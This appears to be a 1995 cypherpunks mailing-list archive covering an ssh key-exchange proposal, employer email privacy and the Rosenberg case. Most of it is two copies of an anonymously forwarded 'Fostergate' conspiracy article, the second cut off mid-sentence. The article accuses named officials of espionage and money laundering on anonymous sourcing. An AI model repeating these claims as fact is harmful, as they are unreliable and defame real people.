Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A At 09:32 PM 7/30/95 -0700, Timothy C. May wrote: > > I'm going to get in trouble for writing this message... Heh, heh. Infobahn also has an article by Sandy Sandfort in it; Sandy had it at the SF Cpunks meeting, so I assumed I'd be able to find it at the store (haven't yet; the first issue was 40K copies for nationwide distribution.) Michael Berch, the publisher, is a reasonable guy, if you like his type. mcb at postmodern.com (infobahn.com was taken). He's got some lawyer background and hacked computers at LLNL for a while. >Bay Aryans Gack. You will get in trouble :-) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A Message-ID: <199507310737.JAA06792@cnam.fr> On Sunday 23 July 95, at 14 h 45, the keyboard of Tatu Ylonen wrote: > People have also suggested using the Photuris protocol that is part of > the IP Security work being done at IETF > (ftp://www.cnri.reston.va.us/internet-drafts/draft-ietf-ipsec-photuris-02.txt ). > > The basic idea behind the protocol goes roughly like this: > 1. Exchange session keys using Diffie-Hellman > 2. Each side sends a signature of the Diffie-Hellman exchange (the > signature can be with any of a number of algorithms; RSA and > Elliptic Curve systems have been defined). > > If this were adapted to ssh, the protocol would look roughly like > this: > 1. Exchange session keys using Diffie-Hellman > 2. Each side sends a signature of the Diffie-Hellman exchange by its > host key > 3. RSA and Rhosts authentication requests would include a signature > by the requesting key. > > This would get rid of the server key and the need to regenerate it, > because the diffie-hellman exchange already prevents decrypting old > conversations. The challenge-dialogs could be avoided (unless they > are needed for performance reasons to avoid unnecessary signature > computations). > > One could also eliminate RSA in future and start using some other > public key cryptosystem if desired. The Diffie-Hellman patent and the > generic public key patent expire in 1997; the RSA-patent does not > expire until about year 2000. > > > Anyway, this would be a major change that probably cannot easily be > made compatibly. Maybe an incompatible ssh-2.x? Anyway, I don't want > to rush into making major changes in the protocol. > > I would very much like to hear comments on this approach. > > Tatu Stephane Bortzmeyer Conservatoire National des Arts et Metiers bortzmeyer at cnam.fr Laboratoire d'Informatique 292, rue Saint-Martin tel: +33 (1) 40 27 27 31 75141 Paris Cedex 03 fax: +33 (1) 40 27 27 72 France "C'est la nuit qu'il est beau de croire a la lumiere." E. Rostand From hoz at univel.telescan.com Mon Jul 31 00:42:04 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Mon, 31 Jul 95 00:42:04 PDT Subject: The little sex kitten Message-ID: <9507310742.AA17010@toad.com> >> ...scumbags I work for sprang just such a document on us.... >> I actually did sign.... Did you promise not to use strong crypto? My (definitely NOT scumbag etc.) employer has notified all email users that email is NOT private. As far as I know, (and I think I WOULD know) management has never examined email not addressed to them, but if they felt it was justified, I'm sure they would. After all, it is their computer..... Its not censorship when you refuse to pay for the podium! Rick F. Hoselton (who doesn't claim to present opinions for others) From anon-remailer at utopia.hacktic.nl Mon Jul 31 00:49:57 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 31 Jul 95 00:49:57 PDT Subject: Why Vince Foster Was Killed Message-ID: <199507310749.JAA12241@utopia.hacktic.nl> ---------- Forwarded message ---------- From: QDQD56A at prodigy.com (Ct Buskuhl) Newsgroups: alt.current-events.clinton.whitewater Subject: Fostergate Reprint Date: 31 Jul 1995 05:40:06 GMT James Norman is the Senior Editor for the highly respected FORBES magazine. Several months ago, he wrote an article about the death of Vince Foster, called "Fostergate." This article was set to run and was pulled at the last minute by forces that are unknown at this time. You may recall a similar situation with the Washington Post spiking the Mena story at the last minute - despite their own lawyers clearing it to run. The Mena story ended up in this month's Penthouse magazine of all places. Fortunately Mr. Norman's article found a more respectable home - at Media Bypass! Media Bypass will feature this article in their August issue. I certainly owe them a little plug for posting this in advance. You may subscribe to it by calling 1-800-4-BYPASS. The article is as follows: FOSTERGATE by James R. Norman "Was White House Deputy Counsel Vince Foster selling US secrets to Israel? The CIA suspects he was." TWO weeks before his death on July 20, 1993, White House Deputy Counsel Vincent W. Foster went into a deep funk. The official cause of death, given by former Independent Counsel Robert Fiske Jr. (who was later replaced by Kenneth Starr), was suicide driven by depression over, among other things, several newspaper editorials. But Vince Foster had a much bigger and darker reason to be seriously burned out. He had just learned he was under investigation for espionage. Outrageous? To say the least. But a lengthy investigation has located over a dozen sources with connections to the intelligence community who confirm a shocking story of money laundering and espionage connected to the highest levels of the White House. Without grants of immunity, the sources risk going to prison for violation of the National Security Act. Virtually all have demanded anonymity. According to a veteran Central Intelligence Agency operative close to the Foster investigation, Foster's first indication of trouble came when he inquired about his coded bank account at Banca Della Svizzera Italiana in Chiasso, Switzerland and found the account empty. Foster was shocked to learn from the bank that someone using his secret authorization code had withdrawn all $2.73 million he had stashed there and had moved it to, of all places, the U.S. Treasury. Then, according to credit card records reviewed by a private investigator who has revealed them, Foster canceled the two-day round- trip TWA and Swiss Air plane tickets to Geneva he had purchased on his American Express card through the White House travel office on July 1. Discretely he began asking what was afoot, says the CIA source, confirming that someone in the White House tipped him off. It was bad news. The CIA had Foster under serious investigation for leaking high- security secrets to the State of Israel. For months, a small cadre of CIA computer hackers known as the Fifth Column, armed with a Cray supercomputer, had been monitoring Foster's Swiss account. They had located it by tracking money flows from various Israeli government accounts after finding Foster's name while secretly snooping through the electronic files of Israel's Mossad. Then by snooping through the bank files, they gathered all the information needed to withdraw the money. Foster was just one of the first of scores of high level U.S. political figures to thus have their secret Swiss accounts looted of illicit funds, according to both this veteran CIA source and a separate source in another intelligence agency. Over the past two years, they say, more than $2 billion has been swept out of offshore bank accounts belonging to figures connected to the U.S. government with nary a peep from the victims or their banks. The claim that Foster and other U.S. figures have had offshore accounts has been confirmed by a separate high-ranking CIA source and another in the Department of Justice. Various sources, some of them controversial, have contributed other pieces to this puzzle. Whatever their motivations, those sources have proven remarkably consistent. Their stories jibe well with known facts and offer a most plausible explanation for Foster's mysterious depression. It would also explain Washington's determined effort to dismiss the Foster affair as a tragic but simple suicide. Vince Foster a spy? Actually, it is much worse than that, if the CIA's suspicions are confirmed by the ongoing foreign counterintelligence probe. He would have been an invaluable double agent with potential access to not only high-level political information, but also to sensitive code, encryption and data transmission secrets, the stuff by which modern war is won or lost. That is because for many years, according to nine separate current and former U.S. law enforcement or intelligence officials, Foster had been a behind-the-scenes manager of a key support company in one of the biggest, most secretive spy efforts on record, the silent surveillance of banking transactions both here and abroad. This bank snooping effort began in earnest soon after Ronald Reagan became president in 1981. Its primary aim was to track the money behind international terrorist groups and soon came to be dubbed, "Follow the money", according to the originator of the program Norman A. Bailey. Now a private Washington consultant on international banking, Bailey was an economist and Reagan advisor on the National Security Counsel. It was Bailey's idea to begin using powerful new computer and electronic eavesdropping technologies then emerging to let the intelligence community monitor the previously confidential flow of bank wire transfers. This was no small task; more than $1 trillion a day moves through New York alone. Bailey, himself constrained by the National Security Act, claims he doesn't know exactly how the data was collected. But he confirms that within a few years (of 1981) The National Security Agency (NSA), the signals intelligence arm of the government, had begun vacuuming up mountains of data by listening in on bank wire traffic. It became a joint effort of several Western governments with the Israelis playing a leading role, since they were the main targets of terrorism. Other intelligence experts say the flow of bits and bytes was captured by various means; from simply tapping phone lines to implanting customized chips in bank computers to store up and periodically "burst- transmit" data to a passing van, or low-flying "sig-int" or signals intelligence satellite. Another part of the problem was to get the world's banks to standardize their data so that it could be easily analyzed. And that brings up to PROMIS, a powerful tracking tracking software developed for the U.S. Government and then further enhanced by a little company called Inslaw Inc. PROMIS stands for Prosecutor's Management Information Systems and was designed to manage legal cases. In 1982, just as Bailey's follow-the- money effort was gaining steam, the Reagan Justice Department eagerly snapped up Inslaw's newest version of PROMIS. But the government refused to pay the $6 million owed for it, claiming part of the contract was not fulfilled. Inslaw, forced into Chapter 11 reorganization, and nearly driven to quick liquidation by the government and its former partner AT&T, hotly denied that claim. Ultimately, a bankruptcy judge ruled the government stole the PROMIS software by "trickery, fraud and deceit." Why PROMIS? Because it was adaptable. Besides tracking legal cases, it could be easily customized to track anything from computer chip design to complex monetary transactions. It was especially useful for tracking criminals or just plain political dissidents. Inslaw claims the software was eventually illegally sold to as many as 50 countries for use by their police, military or intelligence agencies, including such bloody regimes as Guatemala, South Africa and Iraq (before the 1990 invasion of Kuwait). Profits on these sales, Inslaw claims, went mainly into the private pockets of Republican political cronies in the 1980s, including Reagan confident Barl Brain, former part-owner of UPI and FNN. Among the biggest profiteers on PROMIS, according to the 1992 book by former Israeli anti-terrorism staffer Ari Ben-Menaseche, was former British publisher Bob Maxwell. On behalf of the Israelis, Maxwell aggressively marketed a doctored version of PROMIS equipped with one or more "back doors" to allow an outsider to tap into the user's data base without leaving an audit trail. In fact, it may have been such rigged programs that allowed noted Israeli spy Jonathon Pollard, from his computer terminal at the Office of Naval Intelligence in Washington, to download vast amounts of top secret U.S. nuclear weapons and code data in the mid-1980s. According to a heavily-redacted New Mexico FBI counterintelligence report, Maxwell was apparently allowed to sell two copies of PROMIS back to the U.S. weapons labs at Sandia and Los Alamos, for what Inslaw claims was a hugely inflated price of $87 million. That would have allowed Pollard, if he was using the rigged program, to obtain U.S. missile targeting data long before Israel had its own satellite capability, thus making it a real nuclear threat to the Soviet Union. Pollard was convicted of espionage and sentenced in 1986 to life imprisonment. U.S. officials have vehemently opposed efforts to gain his early release. Maxwell, according to Ben-Menaseche and nine other sources, was also selling pirated versions of PROMIS to major world banks for use in their wire transfer rooms to track the blizzard of numbers, authorization codes and confirmations required on each wire transaction. Don't expect any banks to admit running PROMIS software. They probably now know it was pilfered. But they readily took it both because it was the best tracking software available at the time and because the U.S. government was tacitly leaning on them to go along with the surveillance effort or face regulatory reprisals or prosecution on money laundering charges. With the widespread adoption of PROMIS, the data became standardized and much easier to analyze by the NSA. It took some effort to install and support PROMIS in the banking industry. That's where Vince Foster came in. Sources say that since at least the late 1970s, Foster had been a silent, behind-the-scenes overseer on behalf of the NSA for a small Little Rock, Ark., bank data processing company. Its name was Systematics Inc., launched in 1967 and funded and controlled for most of its life by Arkansas billionaire Jackson Stephens, a 1946 Naval Academy graduate along with Jimmy Carter. Foster was one of Stephens' trusted deal makers at the Rose Law Firm, where he was partner with Hillary Rodham Clinton, Webster Hubbell and William Kennedy (whose father was a Systematics director). Hubbell also played an overseer role at Systematics for the NSA for some years according to intelligence sources. Systematics has had close ties to the NSA and CIA ever since its founding, sources say, as a money-shuffler for covert operations. It is no secret that there were billions of dollars moving around in "black" accounts - from buying and selling arms to the Contras, Iran, Iraq, Angola, and other countries to paying CIA operatives and laundering money from clandestine CIA drug dealing (such as at Mena, Arkansas). Having taken over the computer rooms in scores of small U.S. banks as an "out- sourced" supplier of data processing, Systematics was in a unique position to manage that covert money flow. Sources say the money was moved at the end of every day disguised as a routine bank-to-bank balancing transaction, out of view of bank regulators and even the banks themselves. In short, it became cyber-money. One man who uncovered the link between Systematics, Foster and covert money movements from arms and drugs was Bob Bickel, who was an undercover Customs investigator in the 1980s. "We found Systematics was often a conduit for the funds" in arms and drug transactions, says Bickel, now living in Texas: "They were the money changers." His story is corroborated by a former CIA employee who says it was well known within the agency in the late 1970s that Foster was involved with Systematics in covert money management. Another source is Michael Ricoposciuto, former research director of the covert arms operation at California's tiny Cabazon Indian Reservation in the early 1980s. Ricoposciuto claims his crew of computer programmers helped customize PROMIS there for banking and other uses. He is now serving 80 years in a South Carolina federal prison ostensibly on drug charges. Though maybe not a credible source on his own, his story fits well with other sources. Systematics' money-laundering role for the intelligence community might help explain why Jackson Stephens tried to take over Washington-based Financial General Bankshares in 1978 on behalf of Arab backers of the Bank of Credit and Commerce International (BCCI). BCCI's links to global corruption and intelligence operations has been well documented, though many mysteries remain. According to a lawsuit filed by the Securities and Exchange Commission, Stephens insisted on having then-tiny Systematics brought in to take over all of FGB's data processing. Representing Systematics in that 1978 SEC case: Hillary Rodham Clinton and Webster Hubbell. Stephens was blocked in that takeover. But FGB, later renamed First American, ultimately fell under the alleged domination of BCCI through Robert Altman and former Defense Secretary Clark Clifford. According to a technician who worked for First American in Atlanta, Systematics became a key computer contractor there anyway. In the 1980s, Systematics' business boomed. When it first sold stock to the public in 1983, revenues were $64 million. That had risen to $230 million by the time Stephens arranged Systematics' sale to Alltel Corp., a telephone holding company which then moved its headquarters to Little Rock. Last year, Systematics sales hit $861 million - a third of Alltel's total. Stephens now owns more than 8 percent of Alltel and wields significant influence over the company. When Bill Clinton was elected president in 1992, bringing Foster, Hubbell and Kennedy to the White House staff, Systematics' foreign bank business flourished. It began to announce a flood of data processing deals with major banks in Moscow, Maoso, Singapore, Malaysia, Pakistan, Trinidad and elsewhere. According to veteran bank software vendors, and computer intelligence specialist Wayne Madsen, co-author of a book about the NSA called "The Puzzle Palace", it is inconceivable any U.S. company could land such lucrative work without the intimate participation of the NSA. Domestic business took off as well, with giants like Citibank and Nations Bank signing big data processing deals. Working alongside Systematics in this spooky world of bank computer spying appears to be a cluster of other curious, loosely-affiliated companies. For instance, there is Boston Systematics, headed by former CIA officer Harry Wechsler, who controls two Israeli companies that also use the name Systematics. Wechsler denies any connection to the Arkansas company (now named Alltel Information Services) and claims to know nothing of PROMIS. Odd, then, that Inslaw claims it got two inquiries in 1987 from Wechter's Israeli company seeking marketing data on PROMIS. Many of the intelligence sources who provided information for this story insist that Boston Systematics and the Arkansas company are, in fact, related in some way. And based on his own source in the Justice Department, Inslaw's founder William A. Hamilton says he believes Boston Systematics was also closely linked with both Maxwell and Rafl Bitan, the former head of Israel's anti-terrorism effort. Hamilton says Bitan, using a false name, showed up at Inslaw's Washington, DC office one day in 1983 for a private demonstration of PROMIS. Another curious company is Arkansas Systems, founded in 1974 by Systematics employee and formerly U.S. Army "analyst" John Chamberlain, located just down the road from Systematics. Arkansas Systems specializes in computer systems for foreign wire transfer centers and central banks. Among its clients: Russia and China, according to Arkansas Systems president James K. Hendren, a physicist formerly involved with the Safeguard anti-missile system. Arkansas Systems was one of the first companies to receive funding from the Arkansas Development Finance Authority (ADFA), an agency created by Bill Clinton that is now coming under Congressional scrutiny. What does Alltel have to say about all of this? "I've never heard anything so asinine in all my life," steams Joe T. Ford, Alltel's chairman and the father of Jack Stephen's chief administrative aide. John Stouri, a former IBM executive who is chief executive of Alltel Information Services, says he had never heard of Boston Systematics before this inquiry. He declares that the Arkansas company does almost no work for the government, scoffs at the idea his company is tied to the NSA and says Foster has never had any connection to Systematics. As for the fact he sold half his 700,000 Alltel shares in February at $34, just before it began skidding to under $24, he says that was merely to pay for the exercise of options. Why is it then that Hamilton claims sources in two separate intelligence agencies say documents relating to Systematics were among those taken from Foster's office immediately after Foster's death? Indeed, a private investigator close to the continuing "Whitewater" probe by Independent Counsel Kenneth W. Starr says he has learned that Hubbell has delivered those documents - including papers related to Systematics - to Starr. Hubbell pleaded guilty last December to two felony counts related to over-billing at the Rose Law Firm and has been sentenced to 21 months in prison. If Foster knew the U.S. was spying on foreign banks, why would he let himself be caught red-handed with a Swiss bank account? The answer may be that the Israeli transactions were, in fact, well concealed, according to the veteran CIA source. And Foster would have known that, unless a prober knew exactly what to look for, finding his payoffs in the torrent of routine wire transfer data would be a hopeless task. Besides that, greed could explain a lot, if not Foster's then for whomever else he might have been playing bagman. The CIA source says Foster was not the only one in the White House under suspicion for peddling state secrets. All of which helps explain Foster's odd behavior before his death. He was a tough, smart trial attorney at the peak of power in Washington. Only 48 years old, he was in excellent health. Suddenly, according to the Fiske report, he couldn't sleep. He complained of heart palpitations and high blood pressure. His sister arranged for him to see a Washington psychiatrist, who later told the FBI he had been instructed not to take notes because Foster's depression was "directly related to highly sensitive and confidential matters" tied to his "top secret" government work. Foster never saw a shrink. Instead, about a week before he died, he hired a lawyer: high-powered DC criminal attorney and political fix-it man James Hamilton. Foster's wife claims his reason was the White House Travel Office controversy, which was expected to lead to congressional hearings. On the weekend of July 17 and 18, Foster drove with his wife to the eastern shore of Maryland to relax. By "coincidence", according to the Fiske report, so did Hubbell. They met at the posh estate of Michael Cardozo, head of Clinton's legal defense fund and son-in-law of prominent Democratic fund raiser Nathan Landau. Hubbell later claimed the weekend was a laid-back gathering of tennis and poolside chit-chat. But according to sources connected to the CIA, Justice Department and another intelligence agency, the meeting was under surveillance. The agenda? Heavy duty damage control. Foster was grilled. To whom else could the Swiss money be traced? How could the scandal be contained? Sorry. File too long. Maybe someone else can post rest. From hoz at univel.telescan.com Mon Jul 31 00:54:16 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Mon, 31 Jul 95 00:54:16 PDT Subject: Sat phone permit "wire"taps Message-ID: <9507310754.AA17446@toad.com> >Different cases - the Walkers gave away information on how the Yankees were >stealing Russian secrets, which the Russians patched up by encrypting. Really? Do you have a reference for this? I am interested. >The most current information on the Rosenbergs, gotten from decrypted Soviet >communications and declassified US and ex-Soviet files, indicates that Ethel >Rosenberg >was probably innocent of spying, and Julius was spying but didn't give away >any useful atomic secrets, and that the FBI probably knew at the time they >had Ethel killed that she was innocent. WOW! Had them killed? They WERE tried and convicted, you know. Are you claiming evidence was manufactured? I head David Khan on CSPAN say that at least one message mentions Ethel Rosenberg. If memory serves, he said something like "without going in to whether evidence was sufficient to convict, and without going in to whether they should have been executed, these transcripts show that they were spying for the Soviets" (I'm not sure that's accurate enough for quotation marks, but that's the basics of what he said. I have it on VCR. Do you have additional information? I'll agree the FBI hasn't always behaved honorably, and maybe they aren't entitled to the benefit of the doubt here. OTOH, actual, admitted facts to this effect might be a great reply to Mr. Freeh when he asks to be allowed to punish us when we make our mail so he can't read it. Rick F. Hoselton (who doesn't claim to present opinions for others) From anon-remailer at utopia.hacktic.nl Mon Jul 31 01:00:31 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 31 Jul 95 01:00:31 PDT Subject: Why Vince Foster Was Killed Message-ID: <199507310800.KAA12393@utopia.hacktic.nl> ---------- Forwarded message ---------- From: QDQD56A at prodigy.com (Ct Buskuhl) Newsgroups: alt.current-events.clinton.whitewater Subject: Fostergate Reprint Date: 31 Jul 1995 05:40:06 GMT James Norman is the Senior Editor for the highly respected FORBES magazine. Several months ago, he wrote an article about the death of Vince Foster, called "Fostergate." This article was set to run and was pulled at the last minute by forces that are unknown at this time. You may recall a similar situation with the Washington Post spiking the Mena story at the last minute - despite their own lawyers clearing it to run. The Mena story ended up in this month's Penthouse magazine of all places. Fortunately Mr. Norman's article found a more respectable home - at Media Bypass! Media Bypass will feature this article in their August issue. I certainly owe them a little plug for posting this in advance. You may subscribe to it by calling 1-800-4-BYPASS. The article is as follows: FOSTERGATE by James R. Norman "Was White House Deputy Counsel Vince Foster selling US secrets to Israel? The CIA suspects he was." TWO weeks before his death on July 20, 1993, White House Deputy Counsel Vincent W. Foster went into a deep funk. The official cause of death, given by former Independent Counsel Robert Fiske Jr. (who was later replaced by Kenneth Starr), was suicide driven by depression over, among other things, several newspaper editorials. But Vince Foster had a much bigger and darker reason to be seriously burned out. He had just learned he was under investigation for espionage. Outrageous? To say the least. But a lengthy investigation has located over a dozen sources with connections to the intelligence community who confirm a shocking story of money laundering and espionage connected to the highest levels of the White House. Without grants of immunity, the sources risk going to prison for violation of the National Security Act. Virtually all have demanded anonymity. According to a veteran Central Intelligence Agency operative close to the Foster investigation, Foster's first indication of trouble came when he inquired about his coded bank account at Banca Della Svizzera Italiana in Chiasso, Switzerland and found the account empty. Foster was shocked to learn from the bank that someone using his secret authorization code had withdrawn all $2.73 million he had stashed there and had moved it to, of all places, the U.S. Treasury. Then, according to credit card records reviewed by a private investigator who has revealed them, Foster canceled the two-day round- trip TWA and Swiss Air plane tickets to Geneva he had purchased on his American Express card through the White House travel office on July 1. Discretely he began asking what was afoot, says the CIA source, confirming that someone in the White House tipped him off. It was bad news. The CIA had Foster under serious investigation for leaking high- security secrets to the State of Israel. For months, a small cadre of CIA computer hackers known as the Fifth Column, armed with a Cray supercomputer, had been monitoring Foster's Swiss account. They had located it by tracking money flows from various Israeli government accounts after finding Foster's name while secretly snooping through the electronic files of Israel's Mossad. Then by snooping through the bank files, they gathered all the information needed to withdraw the money. Foster was just one of the first of scores of high level U.S. political figures to thus have their secret Swiss accounts looted of illicit funds, according to both this veteran CIA source and a separate source in another intelligence agency. Over the past two years, they say, more than $2 billion has been swept out of offshore bank accounts belonging to figures connected to the U.S. government with nary a peep from the victims or their banks. The claim that Foster and other U.S. figures have had offshore accounts has been confirmed by a separate high-ranking CIA source and another in the Department of Justice. Various sources, some of them controversial, have contributed other pieces to this puzzle. Whatever their motivations, those sources have proven remarkably consistent. Their stories jibe well with known facts and offer a most plausible explanation for Foster's mysterious depression. It would also explain Washington's determined effort to dismiss the Foster affair as a tragic but simple suicide. Vince Foster a spy? Actually, it is much worse than that, if the CIA's suspicions are confirmed by the ongoing foreign counterintelligence probe. He would have been an invaluable double agent with potential access to not only high-level political information, but also to sensitive code, encryption and data transmission secrets, the stuff by which modern war is won or lost. That is because for many years, according to nine separate current and former U.S. law enforcement or intelligence officials, Foster had been a behind-the-scenes manager of a key support company in one of the biggest, most secretive spy efforts on record, the silent surveillance of banking transactions both here and abroad. This bank snooping effort began in earnest soon after Ronald Reagan became president in 1981. Its primary aim was to track the money behind international terrorist groups and soon came to be dubbed, "Follow the money", according to the originator of the program Norman A. Bailey. Now a private Washington consultant on international banking, Bailey was an economist and Reagan advisor on the National Security Counsel. It was Bailey's idea to begin using powerful new computer and electronic eavesdropping technologies then emerging to let the intelligence community monitor the previously confidential flow of bank wire transfers. This was no small task; more than $1 trillion a day moves through New York alone. Bailey, himself constrained by the National Security Act, claims he doesn't know exactly how the data was collected. But he confirms that within a few years (of 1981) The National Security Agency (NSA), the signals intelligence arm of the government, had begun vacuuming up mountains of data by listening in on bank wire traffic. It became a joint effort of several Western governments with the Israelis playing a leading role, since they were the main targets of terrorism. Other intelligence experts say the flow of bits and bytes was captured by various means; from simply tapping phone lines to implanting customized chips in bank computers to store up and periodically "burst- transmit" data to a passing van, or low-flying "sig-int" or signals intelligence satellite. Another part of the problem was to get the world's banks to standardize their data so that it could be easily analyzed. And that brings up to PROMIS, a powerful tracking tracking software developed for the U.S. Government and then further enhanced by a little company called Inslaw Inc. PROMIS stands for Prosecutor's Management Information Systems and was designed to manage legal cases. In 1982, just as Bailey's follow-the- money effort was gaining steam, the Reagan Justice Department eagerly snapped up Inslaw's newest version of PROMIS. But the government refused to pay the $6 million owed for it, claiming part of the contract was not fulfilled. Inslaw, forced into Chapter 11 reorganization, and nearly driven to quick liquidation by the government and its former partner AT&T, hotly denied that claim. Ultimately, a bankruptcy judge ruled the government stole the PROMIS software by "trickery, fraud and deceit." Why PROMIS? Because it was adaptable. Besides tracking legal cases, it could be easily customized to track anything from computer chip design to complex monetary transactions. It was especially useful for tracking criminals or just plain political dissidents. Inslaw claims the software was eventually illegally sold to as many as 50 countries for use by their police, military or intelligence agencies, including such bloody regimes as Guatemala, South Africa and Iraq (before the 1990 invasion of Kuwait). Profits on these sales, Inslaw claims, went mainly into the private pockets of Republican political cronies in the 1980s, including Reagan confident Barl Brain, former part-owner of UPI and FNN. Among the biggest profiteers on PROMIS, according to the 1992 book by former Israeli anti-terrorism staffer Ari Ben-Menaseche, was former British publisher Bob Maxwell. On behalf of the Israelis, Maxwell aggressively marketed a doctored version of PROMIS equipped with one or more "back doors" to allow an outsider to tap into the user's data base without leaving an audit trail. In fact, it may have been such rigged programs that allowed noted Israeli spy Jonathon Pollard, from his computer terminal at the Office of Naval Intelligence in Washington, to download vast amounts of top secret U.S. nuclear weapons and code data in the mid-1980s. According to a heavily-redacted New Mexico FBI counterintelligence report, Maxwell was apparently allowed to sell two copies of PROMIS back to the U.S. weapons labs at Sandia and Los Alamos, for what Inslaw claims was a hugely inflated price of $87 million. That would have allowed Pollard, if he was using the rigged program, to obtain U.S. missile targeting data long before Israel had its own satellite capability, thus making it a real nuclear threat to the Soviet Union. Pollard was convicted of espionage and sentenced in 1986 to life imprisonment. U.S. officials have vehemently opposed efforts to gain his early release. Maxwell, according to Ben-Menaseche and nine other sources, was also selling pirated versions of PROMIS to major world banks for use in their wire transfer rooms to track the blizzard of numbers, authorization codes and confirmations required on each wire transaction. Don't expect any banks to admit running PROMIS software. They probably now know it was pilfered. But they readily took it both because it was the best tracking software available at the time and because the U.S. government was tacitly leaning on them to go along with the surveillance effort or face regulatory reprisals or prosecution on money laundering charges. With the widespread adoption of PROMIS, the data became standardized and much easier to analyze by the NSA. It took some effort to install and support PROMIS in the banking industry. That's where Vince Foster came in. Sources say that since at least the late 1970s, Foster had been a silent, behind-the-scenes overseer on behalf of the NSA for a small Little Rock, Ark., bank data processing company. Its name was Systematics Inc., launched in 1967 and funded and controlled for most of its life by Arkansas billionaire Jackson Stephens, a 1946 Naval Academy graduate along with Jimmy Carter. Foster was one of Stephens' trusted deal makers at the Rose Law Firm, where he was partner with Hillary Rodham Clinton, Webster Hubbell and William Kennedy (whose father was a Systematics director). Hubbell also played an overseer role at Systematics for the NSA for some years according to intelligence sources. Systematics has had close ties to the NSA and CIA ever since its founding, sources say, as a money-shuffler for covert operations. It is no secret that there were billions of dollars moving around in "black" accounts - from buying and selling arms to the Contras, Iran, Iraq, Angola, and other countries to paying CIA operatives and laundering money from clandestine CIA drug dealing (such as at Mena, Arkansas). Having taken over the computer rooms in scores of small U.S. banks as an "out- sourced" supplier of data processing, Systematics was in a unique position to manage that covert money flow. Sources say the money was moved at the end of every day disguised as a routine bank-to-bank balancing transaction, out of view of bank regulators and even the banks themselves. In short, it became cyber-money. One man who uncovered the link between Systematics, Foster and covert money movements from arms and drugs was Bob Bickel, who was an undercover Customs investigator in the 1980s. "We found Systematics was often a conduit for the funds" in arms and drug transactions, says Bickel, now living in Texas: "They were the money changers." His story is corroborated by a former CIA employee who says it was well known within the agency in the late 1970s that Foster was involved with Systematics in covert money management. Another source is Michael Ricoposciuto, former research director of the covert arms operation at California's tiny Cabazon Indian Reservation in the early 1980s. Ricoposciuto claims his crew of computer programmers helped customize PROMIS there for banking and other uses. He is now serving 80 years in a South Carolina federal prison ostensibly on drug charges. Though maybe not a credible source on his own, his story fits well with other sources. Systematics' money-laundering role for the intelligence community might help explain why Jackson Stephens tried to take over Washington-based Financial General Bankshares in 1978 on behalf of Arab backers of the Bank of Credit and Commerce International (BCCI). BCCI's links to global corruption and intelligence operations has been well documented, though many mysteries remain. According to a lawsuit filed by the Securities and Exchange Commission, Stephens insisted on having then-tiny Systematics brought in to take over all of FGB's data processing. Representing Systematics in that 1978 SEC case: Hillary Rodham Clinton and Webster Hubbell. Stephens was blocked in that takeover. But FGB, later renamed First American, ultimately fell under the alleged domination of BCCI through Robert Altman and former Defense Secretary Clark Clifford. According to a technician who worked for First American in Atlanta, Systematics became a key computer contractor there anyway. In the 1980s, Systematics' business boomed. When it first sold stock to the public in 1983, revenues were $64 million. That had risen to $230 million by the time Stephens arranged Systematics' sale to Alltel Corp., a telephone holding company which then moved its headquarters to Little Rock. Last year, Systematics sales hit $861 million - a third of Alltel's total. Stephens now owns more than 8 percent of Alltel and wields significant influence over the company. When Bill Clinton was elected president in 1992, bringing Foster, Hubbell and Kennedy to the White House staff, Systematics' foreign bank business flourished. It began to announce a flood of data processing deals with major banks in Moscow, Maoso, Singapore, Malaysia, Pakistan, Trinidad and elsewhere. According to veteran bank software vendors, and computer intelligence specialist Wayne Madsen, co-author of a book about the NSA called "The Puzzle Palace", it is inconceivable any U.S. company could land such lucrative work without the intimate participation of the NSA. Domestic business took off as well, with giants like Citibank and Nations Bank signing big data processing deals. Working alongside Systematics in this spooky world of bank computer spying appears to be a cluster of other curious, loosely-affiliated companies. For instance, there is Boston Systematics, headed by former CIA officer Harry Wechsler, who controls two Israeli companies that also use the name Systematics. Wechsler denies any connection to the Arkansas company (now named Alltel Information Services) and claims to know nothing of PROMIS. Odd, then, that Inslaw claims it got two inquiries in 1987 from Wechter's Israeli company seeking marketing data on PROMIS. Many of the intelligence sources who provided information for this story insist that Boston Systematics and the Arkansas company are, in fact, related in some way. And based on his own source in the Justice Department, Inslaw's founder William A. Hamilton says he believes Boston Systematics was also closely linked with both Maxwell and Rafl Bitan, the former head of Israel's anti-terrorism effort. Hamilton says Bitan, using a false name, showed up at Inslaw's Washington, DC office one day in 1983 for a private demonstration of PROMIS. Another curious company is Arkansas Systems, founded in 1974 by Systematics employee and formerly U.S. Army "analyst" John Chamberlain, located just down the road from Systematics. Arkansas Systems specializes in computer systems for foreign wire transfer centers and central banks. Among its clients: Russia and China, according to Arkansas Systems president James K. Hendren, a physicist formerly involved with the Safeguard anti-missile system. Arkansas Systems was one of the first companies to receive funding from the Arkansas Development Finance Authority (ADFA), an agency created by Bill Clinton that is now coming under Congressional scrutiny. What does Alltel have to say about all of this? "I've never heard anything so asinine in all my life," steams Joe T. Ford, Alltel's chairman and the father of Jack Stephen's chief administrative aide. John Stouri, a former IBM executive who is chief executive of Alltel Information Services, says he had never heard of Boston Systematics before this inquiry. He declares that the Arkansas company does almost no work for the government, scoffs at the idea his company is tied to the NSA and says Foster has never had any connection to Systematics. As for the fact he sold half his 700,000 Alltel shares in February at $34, just before it began skidding to under $24, he says that was merely to pay for the exercise of options. Why is it then that Hamilton claims sources in two separate intelligence agencies say documents relating to Systematics were among those taken from Foster's office immediately after Foster's death? Indeed, a private investigator close to the continuing "Whitewater" probe by Independent Counsel Kenneth W. Starr says he has learned that Hubbell has delivered those documents - including papers related to Systematics - to Starr. Hubbell pleaded guilty last December to two felony counts related to over-billing at the Rose Law Firm and has been sentenced to 21 months in prison. If Foster knew the U.S. was spying on foreign banks, why would he let himself be caught red-handed with a Swiss bank account? The answer may be that the Israeli transactions were, in fact, well concealed, according to the veteran CIA source. And Foster would have known that, unless a prober 